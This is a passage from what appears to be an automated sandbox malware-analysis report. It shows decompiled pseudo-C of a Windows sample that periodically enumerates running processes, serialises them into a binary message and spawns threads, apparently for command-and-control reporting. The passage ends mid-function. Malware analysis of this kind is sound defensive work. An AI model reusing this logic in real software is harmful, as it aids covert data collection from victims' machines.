Part of subcall function 00988420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00988493
Part of subcall function 00988420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0098849A

Part of subcall function 00988700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,0098856F), ref: 00988746
Part of subcall function 00988700: RtlAllocateHeap.NTDLL(00000000), ref: 0098874D
Part of subcall function 00988700: memcpy.NTDLL(00000000,?,?), ref: 009887A9

_snwprintf.NTDLL ref: 009885CC
GetProcessHeap.KERNEL32(00000000,?), ref: 009885D8
HeapFree.KERNEL32(00000000), ref: 009885DF

Part of subcall function 00981C50: memset.NTDLL ref: 00981C70
Part of subcall function 00981C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00981C9C
Part of subcall function 00981C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00981CAE
Part of subcall function 00981C50: RtlAllocateHeap.NTDLL(00000000), ref: 00981CB5
Part of subcall function 00981C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00981CD0
Part of subcall function 00981C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00981CED
Part of subcall function 00981C50: HeapFree.KERNEL32(00000000), ref: 00981CF4

GetProcessHeap.KERNEL32(00000000,?), ref: 00988673
HeapFree.KERNEL32(00000000), ref: 0098867A

Part of subcall function 009884C0: GetProcessHeap.KERNEL32(00000000,00988668,?,?,?,00988668,?), ref: 009884D5
Part of subcall function 009884C0: RtlAllocateHeap.NTDLL(00000000), ref: 009884DC
Part of subcall function 009884C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009884FF
Part of subcall function 009884C0: HeapFree.KERNEL32(00000000), ref: 00988506

GetProcessHeap.KERNEL32(00000000,?), ref: 00988685
HeapFree.KERNEL32(00000000), ref: 0098868C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009886B1
HeapFree.KERNEL32(00000000), ref: 009886B8
GetProcessHeap.KERNEL32(00000000,?), ref: 009886C1
HeapFree.KERNEL32(00000000), ref: 009886C8

Part of subcall function 00981D40: GetProcessHeap.KERNEL32(00000000,00000000,?,0098861B), ref: 00981DA2
Part of subcall function 00981D40: HeapFree.KERNEL32(00000000,?,0098861B), ref: 00981DA9

Part of subcall function 00981E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,00988631), ref: 00981E89
Part of subcall function 00981E50: RtlAllocateHeap.NTDLL(00000000), ref: 00981E90
Part of subcall function 00981E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00981EFB
Part of subcall function 00981E50: HeapFree.KERNEL32(00000000), ref: 00981F02

GetProcessHeap.KERNEL32(00000000,?), ref: 009886D3
HeapFree.KERNEL32(00000000), ref: 009886DA

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

GetProcessHeap.KERNEL32(00000000,?), ref: 009886E5
HeapFree.KERNEL32(00000000), ref: 009886EC

Part of subcall function 009823F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00982422
Part of subcall function 009823F0: RtlAllocateHeap.NTDLL(00000000), ref: 00982429
Part of subcall function 009823F0: memcpy.NTDLL(00988583,?,?), ref: 00982467
Part of subcall function 009823F0: GetProcessHeap.KERNEL32(00000000,00988583), ref: 0098250A
Part of subcall function 009823F0: HeapFree.KERNEL32(00000000), ref: 00982511

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
String ID:
API String ID: 876682111-0
Opcode ID: 36c104872f588d1e7315341f8be42bed1fc49cd2d2b5cb90513ac2aef11b44bf
Instruction ID: d6a2bf211d386d6111142fdeccb0a099b752421fd235da6a846d567ba5fffb4b
Opcode Fuzzy Hash: 36c104872f588d1e7315341f8be42bed1fc49cd2d2b5cb90513ac2aef11b44bf
Instruction Fuzzy Hash: 52514DB2914205AFEB00ABE0EC49FEE7B79EF48305F044454F605D62A2EB31DA55DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00988DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00988DD0(void* __edx) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
				if(_t28 <  *0x98c278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x98c280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M00989044))) {
							case 0:
								 *0x98c280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x98c280 = 0;
								__eax = E00989620(__ecx, __edx);
								__eax = __eax;
								if(__eax == 0) {
									 *0x98c280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x98c29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x98c280 = 0;
								 *0x98c294 = 0x981270;
								 *0x98c298 = 0x981270;
								__eax = E009822E0();
								__eax =  *0x98c02c; // 0x9812f8
								 *0x98c26c = __eax;
								__eax =  *0x98c030; // 0x6a
								 *0x98c268 = 0x98c2a8;
								 *0x98c270 = __eax;
								 *0x98c280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x98c280 = 0;
								__eax = E00988BB0( &_v28);
								__ecx =  &_v36;
								__eax = E00988D50( &_v36);
								__eax =  *0x98cbd0; // 0x0
								_push(0x98c2a8);
								_v32 = __eax;
								_v44 = 0x98c2a8;
								_v44 =  *0x98c1e4();
								__eax =  *0x98c2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = E00988920( &_v24);
									__ecx =  &_v16;
									__eax = E0098A7A0( &_v16);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(E00989F80( &_v84,  &_v52) != 0) {
										 &_v92 =  &_v84;
										if(E00988520( &_v84,  &_v92) == 0) {
											__eax =  *0x98c298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x98c298 = __eax;
											 *0x98c298 = __eax;
										} else {
											__eax = E009899A0();
											__ecx = 0;
											__eax = E009888B0(0);
											__ecx = 0;
											__eax = E0098A750(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(E0098A180( &_v92,  &_v76) != 0) {
												__eax = E00981750();
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = E00989A90(_v76, __edx);
												}
												__eax = E00981750();
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = E00988990(_v68, __edx);
													__esi = 0;
												}
												__eax = E00981750();
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = E0098A810(_v60, __edx);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0x98c280 = 4;
								 *0x98c278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x00988dda
0x00988de6
0x0098903d
0x00989041
0x00988dec
0x00988dec
0x00988df1
0x00988df5
0x00000000
0x00988dfb
0x00988dfb
0x00000000
0x00988e02
0x00988e10
0x00000000
0x00000000
0x00988e13
0x00988e1d
0x00988e22
0x00988e25
0x00988e41
0x00988e4b
0x00988e4f
0x00988e27
0x00988e28
0x00000000
0x00988e2e
0x00988e34
0x00988e3a
0x00988e3e
0x00988e3e
0x00988e28
0x00000000
0x00000000
0x00988e52
0x00988e5c
0x00988e66
0x00988e70
0x00988e75
0x00988e7a
0x00988e7f
0x00988e84
0x00988e8e
0x00988e93
0x00988e9d
0x00988ea1
0x00000000
0x00000000
0x00988ea4
0x00988ea8
0x00988eb2
0x00988eb7
0x00988ebb
0x00988ec0
0x00988ec5
0x00988eca
0x00988ece
0x00988edc
0x00988ee0
0x00988ee8
0x00988ef0
0x00988ef0
0x00988ef4
0x00988ef9
0x00988efe
0x00988f02
0x00988f07
0x00988f0b
0x00988f16
0x00988f21
0x00988f30
0x00988fb1
0x00988fb6
0x00988fbb
0x00988fbe
0x00988fcd
0x00988f32
0x00988f32
0x00988f37
0x00988f39
0x00988f3e
0x00988f40
0x00988f45
0x00988f49
0x00988f54
0x00988f56
0x00988f5b
0x00988f61
0x00988f63
0x00988f67
0x00988f67
0x00988f6c
0x00988f71
0x00988f77
0x00988f79
0x00988f7d
0x00988f82
0x00988f82
0x00988f84
0x00988f89
0x00988f8f
0x00988f91
0x00988f95
0x00988f9a
0x00988f9a
0x00988f8f
0x00988fa9
0x00988fa9
0x00988fdf
0x00988fdf
0x00988ff2
0x00989005
0x0098900b
0x00989013
0x0098901d
0x0098901f
0x0098902b
0x00989037
0x00000000
0x00000000
0x00988dfb
0x00988df5
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00988DDA
SetEvent.KERNEL32 ref: 00988E34
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0098C2A8), ref: 00988ED6
GetProcessHeap.KERNEL32(00000000,?), ref: 00988FA2
HeapFree.KERNEL32(00000000), ref: 00988FA9
GetProcessHeap.KERNEL32(00000000,?), ref: 00988FD8
HeapFree.KERNEL32(00000000), ref: 00988FDF
GetProcessHeap.KERNEL32(00000000,?), ref: 00988FEB
HeapFree.KERNEL32(00000000), ref: 00988FF2
GetProcessHeap.KERNEL32(00000000,?), ref: 00988FFE
HeapFree.KERNEL32(00000000), ref: 00989005
GetTickCount.KERNEL32 ref: 00989013
GetProcessHeap.KERNEL32(00000000,?), ref: 00989030
HeapFree.KERNEL32(00000000), ref: 00989037

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$CountTick$Eventlstrlen
String ID:
API String ID: 1747682351-0
Opcode ID: 851e4537a2493ad9e1c896b6824b3e64dac016f39800c895831848e9c5748ac0
Instruction ID: 2d26fb2541f4793a390432bdb6d67fd4bafbf33a8ab75aaeaf4c5a9e819b423c
Opcode Fuzzy Hash: 851e4537a2493ad9e1c896b6824b3e64dac016f39800c895831848e9c5748ac0
Instruction Fuzzy Hash: 37519CB252C2009FD700FFA4EC8AB5A7BA9FB84311F440919F555977A1DB31C804EBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00988BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00988BB0(char** __ecx) {
				short* _v8;
				long _v12;
				char** _v16;
				int* _v20;
				short _v540;
				char** _t39;
				short* _t49;
				int* _t61;
				int _t71;
				int _t73;
				signed int _t74;
				short* _t75;
				intOrPtr* _t80;
				long _t82;
				int _t83;
				char** _t84;
				WCHAR* _t86;
				char* _t87;

				_v12 = 0;
				_t73 = 0;
				_v16 = __ecx;
				 *__ecx = 0;
				_t39 =  &(__ecx[1]);
				_v20 = _t39;
				_v8 = 0;
				 *_t39 = 0;
				GetModuleFileNameW(0,  &_v540, 0x104);
				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
				if(_t86 >  &_v540) {
					while( *_t86 != 0x5c) {
						_t86 = _t86 - 2;
						if(_t86 >  &_v540) {
							continue;
						} else {
						}
						goto L6;
					}
					_t86 =  &(_t86[1]);
				}
				L6:
				E00982110( &_v12);
				_t80 = _v12;
				if(_t80 != 0) {
					_t75 = 0;
					do {
						_t14 = _t80 + 4; // 0x4
						_t71 = lstrlenW(_t14);
						_t80 =  *_t80;
						_t75 = _t75 + 1 + _t71;
					} while (_t80 != 0);
					_v8 = _t75;
					_t73 = 0;
				}
				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8);
				_v8 = _t49;
				if(_t49 == 0) {
					return 0 |  *_v16 != 0x00000000;
				} else {
					_t82 = _v12;
					while(_t82 != 0) {
						_t19 = _t82 + 4; // 0x4
						if(lstrcmpiW(_t19, _t86) == 0) {
							_t49 = _v8;
						} else {
							_t20 = _t82 + 4; // 0x4
							lstrcpyW( &(_v8[_t73]), _t20);
							_t24 = _t82 + 4; // 0x4
							_t74 = _t73 + lstrlenW(_t24);
							_t49 = _v8;
							_t49[_t74] = 0x2c;
							_t73 = _t74 + 1;
						}
						_t82 =  *_t82;
					}
					_t87 = 0;
					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0);
					if(_t83 != 0) {
						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
						if(_t87 != 0) {
							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
							_t61 = _v20;
							if(_t61 != 0) {
								 *_t61 = _t83;
							}
						}
					}
					_t84 = _v16;
					 *_t84 = _t87;
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0 |  *_t84 != 0x00000000;
				}
			}

0x00988bbc
0x00988bc3
0x00988bc5
0x00988bca
0x00988bcc
0x00988bcf
0x00988bd7
0x00988bde
0x00988be8
0x00988c01
0x00988c0c
0x00988c10
0x00988c16
0x00988c21
0x00000000
0x00000000
0x00988c23
0x00000000
0x00988c21
0x00988c25
0x00988c25
0x00988c28
0x00988c2b
0x00988c30
0x00988c35
0x00988c37
0x00988c40
0x00988c40
0x00988c44
0x00988c4a
0x00988c4d
0x00988c4f
0x00988c53
0x00988c56
0x00988c56
0x00988c67
0x00988c6d
0x00988c72
0x00988d4a
0x00988c78
0x00988c78
0x00988c7d
0x00988c80
0x00988c8d
0x00988cbb
0x00988c8f
0x00988c8f
0x00988c9a
0x00988ca0
0x00988caa
0x00988cb1
0x00988cb4
0x00988cb8
0x00988cb8
0x00988cbe
0x00988cc0
0x00988cc4
0x00988cd8
0x00988cdc
0x00988cee
0x00988cf2
0x00988d06
0x00988d0c
0x00988d11
0x00988d13
0x00988d13
0x00988d11
0x00988cf2
0x00988d15
0x00988d1d
0x00988d26
0x00988d39
0x00988d39

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00988BE8
lstrlenW.KERNEL32(?), ref: 00988BF5
lstrlenW.KERNEL32(00000004), ref: 00988C44
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00988C60
RtlAllocateHeap.NTDLL(00000000), ref: 00988C67
lstrcmpiW.KERNEL32(00000004,?), ref: 00988C85
lstrcpyW.KERNEL32(00000000,00000004), ref: 00988C9A
lstrlenW.KERNEL32(00000004), ref: 00988CA4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00988CD2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00988CE1
RtlAllocateHeap.NTDLL(00000000), ref: 00988CE8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00988D06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00988D1F
HeapFree.KERNEL32(00000000), ref: 00988D26

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
String ID:
API String ID: 2501218360-0
Opcode ID: b90339af05ccf2c38d314f4998db17bc79916ff441f88f0647ca1025b5fac146
Instruction ID: 344c5f40615d5523acab80f8e6312966eb876b34cbf7ae613111cf72235532d8
Opcode Fuzzy Hash: b90339af05ccf2c38d314f4998db17bc79916ff441f88f0647ca1025b5fac146
Instruction Fuzzy Hash: F1517EB6904219AFDB209FA4DC8CA9BBBB8EF44710F550465E908D7350EB309941DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0098A690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0098A690(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, E0098A3A0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x98cbd4; // 0x0
					 *_t32 = _t25;
					 *0x98cbd4 = _t32;
					return _t25;
				}
			}

0x0098a692
0x0098a6a4
0x0098a6aa
0x0098a6ae
0x0098a743
0x0098a6b4
0x0098a6b6
0x0098a6bb
0x0098a6be
0x0098a6be
0x0098a6c1
0x0098a6c7
0x0098a6d1
0x0098a6eb
0x0098a6ef
0x0098a731
0x00000000
0x0098a73b
0x0098a701
0x0098a704
0x0098a70a
0x0098a70f
0x0098a72b
0x00000000
0x0098a72b
0x0098a711
0x0098a716
0x0098a718
0x0098a720
0x0098a720

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,0098A87A,?,000DBBA0,?,?,?,?,?,?,?,00988F9A), ref: 0098A69D
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0098A6A4
memcpy.NTDLL(00000010,?,?,?,00000000,0098A87A,?,000DBBA0,?,?,?,?,?,?,?,00988F9A), ref: 0098A6D1
GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,00988F9A), ref: 0098A6DE
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0098A6E5
CreateThread.KERNEL32(00000000,00000000,0098A3A0,00000000,00000000,00000000), ref: 0098A704
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00988F9A), ref: 0098A724
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00988F9A), ref: 0098A72B
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00988F9A), ref: 0098A734
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00988F9A), ref: 0098A73B

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
String ID:
API String ID: 1978610079-0
Opcode ID: a850246faee6a90bd46f13f0685d6ac5a9b387c6dfbf73dc46c683a0410d0ced
Instruction ID: a1bf0512adcb3b56f148d657f20329bc84ca9cd57b517cddac68ac3680214fba
Opcode Fuzzy Hash: a850246faee6a90bd46f13f0685d6ac5a9b387c6dfbf73dc46c683a0410d0ced
Instruction Fuzzy Hash: 78213AB5618601AFE7209F69EC4DF46BBA8FF88711F10851AFA59C7791CB30E450DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00981C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00981C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v524;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t31;
				int _t32;
				void* _t35;
				intOrPtr* _t36;

				_t35 = 0;
				_v12 = 0x200;
				_t36 = __ecx;
				_t31 = __edx;
				_v8 = __edx;
				memset(__ecx, 0, 0x14);
				_push( &_v12);
				_push( &_v524);
				_push(0);
				if( *0x98c0cc() >= 0) {
					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
					if(_t32 != 0) {
						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
						if(_t35 != 0) {
							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
						}
					}
					_t31 = _v8;
				}
				 *_t36 =  *0x98c244(_t35, 0, 0, 0, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				_t19 =  *_t36;
				if(_t19 == 0) {
					L9:
					return 0;
				} else {
					_t21 =  *0x98c254(_t19, _t31, _a4, 0, 0, 3, 0, 0);
					 *((intOrPtr*)(_t36 + 4)) = _t21;
					if(_t21 == 0) {
						 *0x98c234( *_t36);
						goto L9;
					} else {
						 *((intOrPtr*)(_t36 + 0xc)) = 3;
						return 1;
					}
				}
			}

0x00981c5e
0x00981c60
0x00981c67
0x00981c69
0x00981c6d
0x00981c70
0x00981c7c
0x00981c83
0x00981c84
0x00981c8d
0x00981ca2
0x00981ca6
0x00981cbb
0x00981cbf
0x00981cd0
0x00981cd0
0x00981cbf
0x00981cd6
0x00981cd6
0x00981ceb
0x00981cf4
0x00981cfa
0x00981cfe
0x00981d39
0x00981d3f
0x00981d00
0x00981d0f
0x00981d15
0x00981d1a
0x00981d31
0x00000000
0x00981d1d
0x00981d1d
0x00981d2e
0x00981d2e
0x00981d1a

APIs

memset.NTDLL ref: 00981C70
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00981C9C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00981CAE
RtlAllocateHeap.NTDLL(00000000), ref: 00981CB5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00981CD0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00981CED
HeapFree.KERNEL32(00000000), ref: 00981CF4

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
String ID:
API String ID: 4040929015-0
Opcode ID: e04b33ef634f27fa90ca9e3510364e89c8ba7cace4ec68cf2d4bfff43bae0705
Instruction ID: e34ff9535a94ce97fe1e69f89e1097469585261b29c4f393f554bc5dc37ee4e2
Opcode Fuzzy Hash: e04b33ef634f27fa90ca9e3510364e89c8ba7cace4ec68cf2d4bfff43bae0705
Instruction Fuzzy Hash: 6331A0B1648304BBF7205FA5AC8DFAB7BBCEB85B11F100169BA54D62D1DB7099409B70

Uniqueness

Uniqueness Score: -1.00%

Function 00989F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00989F80(intOrPtr* __ecx, unsigned int* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				long _t50;
				signed char _t61;
				signed char _t63;
				signed char _t65;
				signed char _t67;
				signed char _t69;
				intOrPtr _t71;
				intOrPtr* _t72;
				int _t73;
				int _t74;
				int _t75;
				intOrPtr _t77;
				signed char _t78;
				signed char _t80;
				signed char _t82;
				signed char _t84;
				signed char _t86;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				int _t93;
				signed char* _t94;
				void* _t95;
				intOrPtr _t96;
				char* _t99;
				signed char* _t100;
				signed char* _t101;
				void* _t102;
				char* _t103;
				signed char* _t104;
				void* _t105;
				char* _t106;
				signed char* _t107;
				void* _t108;
				char* _t109;
				signed char* _t110;

				_t94 = __edx;
				_v16 = __ecx;
				_t96 = 1;
				_v12 = 1;
				_t37 =  *__edx;
				if(_t37 > 0x7f) {
					do {
						_t37 = _t37 >> 7;
						_t96 = _t96 + 1;
					} while (_t37 > 0x7f);
					_v12 = _t96;
				}
				_t4 =  &(_t94[8]); // 0x0
				_t38 =  *_t4;
				_t77 = 1;
				while(_t38 > 0x7f) {
					_t38 = _t38 >> 7;
					_t77 = _t77 + 1;
				}
				_t5 =  &(_t94[0x18]); // 0x0
				_t39 =  *_t5;
				_t89 = 1;
				while(_t39 > 0x7f) {
					_t39 = _t39 >> 7;
					_t89 = _t89 + 1;
				}
				_t6 =  &(_t94[0x20]); // 0x0
				_t40 =  *_t6;
				_t71 = 1;
				while(_t40 > 0x7f) {
					_t40 = _t40 >> 7;
					_t71 = _t71 + 1;
				}
				_t7 =  &(_t94[0x28]); // 0x0
				_t41 =  *_t7;
				_v8 = 1;
				while(_t41 > 0x7f) {
					_v8 = _v8 + 1;
					_t41 = _t41 >> 7;
				}
				_t11 =  &(_t94[0x28]); // 0x0
				_t12 =  &(_t94[0x20]); // 0x0
				_t13 =  &(_t94[0x18]); // 0x0
				_t14 =  &(_t94[8]); // 0x0
				_t72 = _v16;
				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf;
				 *(_t72 + 4) = _t50;
				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50);
				 *_t72 = _t99;
				if(_t99 != 0) {
					 *_t99 = 8;
					_t100 = _t99 + 1;
					_t78 =  *_t94;
					while(_t78 > 0x7f) {
						_t69 = _t78;
						_t78 = _t78 >> 7;
						 *_t100 = _t69 | 0x00000080;
						_t100 =  &(_t100[1]);
					}
					 *_t100 = _t78 & 0x0000007f;
					_t100[1] = 0x12;
					_t101 =  &(_t100[2]);
					_t20 =  &(_t94[8]); // 0x0
					_t73 =  *_t20;
					_t80 = _t73;
					_t21 =  &(_t94[4]); // 0x0
					_t90 =  *_t21;
					if(_t73 > 0x7f) {
						do {
							_t67 = _t80;
							_t80 = _t80 >> 7;
							 *_t101 = _t67 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t80 > 0x7f);
					}
					 *_t101 = _t80 & 0x0000007f;
					_t102 =  &(_t101[1]);
					memcpy(_t102, _t90, _t73);
					_t103 = _t102 + _t73;
					 *_t103 = 0x1d;
					_t22 =  &(_t94[0xc]); // 0x0
					 *(_t103 + 1) =  *_t22;
					 *((char*)(_t103 + 5)) = 0x25;
					_t25 =  &(_t94[0x10]); // 0x0
					 *(_t103 + 6) =  *_t25;
					 *((char*)(_t103 + 0xa)) = 0x2a;
					_t104 = _t103 + 0xb;
					_t28 =  &(_t94[0x18]); // 0x0
					_t74 =  *_t28;
					_t82 = _t74;
					_t29 =  &(_t94[0x14]); // 0x0
					_t91 =  *_t29;
					if(_t74 > 0x7f) {
						do {
							_t65 = _t82;
